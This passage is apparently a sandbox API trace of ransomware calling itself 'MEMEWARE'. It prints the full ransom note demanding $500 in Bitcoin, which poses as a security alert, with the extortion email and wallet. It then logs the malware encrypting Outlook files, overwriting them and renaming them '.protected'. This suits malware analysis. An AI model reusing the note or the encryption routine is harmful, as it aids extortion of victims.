SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.199] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.200] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.200] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0085.200] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.200] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.200] CloseHandle (hObject=0x14c) returned 1 [0085.201] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0085.201] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0085.201] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RESTORE_FILES.txt") returned 82 [0085.201] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0085.202] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.202] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0085.202] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.202] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0085.203] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.203] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0085.203] CloseHandle (hObject=0xd8) returned 1 [0085.203] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Windows") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Program Files") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="Program Files (x86)") returned -1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="$Recycle.bin") returned 1 [0085.203] lstrcmpiW (lpString1="Outlook", lpString2="System Volume Information") returned -1 [0085.203] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook") returned 65 [0085.203] lstrcmpW (lpString1="Outlook", lpString2=".") returned 1 [0085.203] lstrcmpW (lpString1="Outlook", lpString2="..") returned 1 [0085.203] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*") returned 67 [0085.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0085.204] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.204] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\.") returned 67 [0085.204] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.204] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\..") returned 68 [0085.204] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.204] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.204] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Windows") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Program Files") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="Program Files (x86)") returned -1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="$Recycle.bin") returned 1 [0085.204] lstrcmpiW (lpString1="mapisvc.inf", lpString2="System Volume Information") returned -1 [0085.204] 
wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.204] StrStrIW (lpFirst="mapisvc.inf", lpSrch=".protected") returned 0x0 [0085.204] lstrcmpW (lpString1="mapisvc.inf", lpString2="RESTORE_FILES.txt") returned -1 [0085.204] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.204] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".txt") returned 0x0 [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".rar") returned 0x0 [0085.205] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf") returned 77 [0085.205] StrStrW (lpFirst="mapisvc.inf", lpSrch=".zip") returned 0x0 [0085.205] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x462, lpOverlapped=0x0) returned 1 [0085.207] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffb9e, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x462, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x462, lpOverlapped=0x0) returned 1 [0085.207] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.207] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.207] CloseHandle (hObject=0x14c) returned 1 [0085.207] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.protected") returned 87 [0085.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\mapisvc.inf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\mapisvc.inf.protected")) returned 1 [0085.209] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="Windows") returned -1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="Program Files") returned -1 [0085.209] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", 
lpString2="Program Files (x86)") returned -1 [0085.210] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="$Recycle.bin") returned 1 [0085.210] lstrcmpiW (lpString1="Outlook.sharing.xml.obi", lpString2="System Volume Information") returned -1 [0085.210] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrIW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".protected") returned 0x0 [0085.210] lstrcmpW (lpString1="Outlook.sharing.xml.obi", lpString2="RESTORE_FILES.txt") returned -1 [0085.210] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.210] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".txt") returned 0x0 [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW (lpFirst="Outlook.sharing.xml.obi", lpSrch=".rar") returned 0x0 [0085.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi") returned 89 [0085.210] StrStrW 
(lpFirst="Outlook.sharing.xml.obi", lpSrch=".zip") returned 0x0 [0085.211] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0xb9, lpOverlapped=0x0) returned 1 [0085.211] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.211] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0xb9, lpOverlapped=0x0) returned 1 [0085.212] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.212] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.212] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.212] CloseHandle (hObject=0x14c) returned 1 [0085.212] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.protected") returned 99 [0085.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\Outlook.sharing.xml.obi.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\outlook\\outlook.sharing.xml.obi.protected")) returned 1 [0085.213] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Program Files") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="Program Files (x86)") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1="RoamCache", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache") returned 75 [0085.213] lstrcmpW (lpString1="RoamCache", lpString2=".") returned 1 [0085.213] lstrcmpW (lpString1="RoamCache", lpString2="..") returned 1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*") returned 77 [0085.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0085.213] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0085.213] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\.") returned 77 [0085.213] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0085.213] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0085.213] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.213] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.213] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\..") returned 78 [0085.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.214] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Windows") returned -1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Program Files") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="Program Files (x86)") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="$Recycle.bin") returned 1 [0085.214] lstrcmpiW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="System Volume Information") returned -1 [0085.214] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.214] StrStrIW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", 
lpSrch=".protected") returned 0x0 [0085.214] lstrcmpW (lpString1="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpString2="RESTORE_FILES.txt") returned 1 [0085.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_contactprefs_2_f230e11936b7d740a008ffc660e83c71.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.214] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".txt") returned 0x0 [0085.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.215] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".rar") returned 0x0 [0085.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat") returned 134 [0085.215] StrStrW (lpFirst="Stream_ContactPrefs_2_F230E11936B7D740A008FFC660E83C71.dat", lpSrch=".zip") returned 0x0 [0085.215] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, 
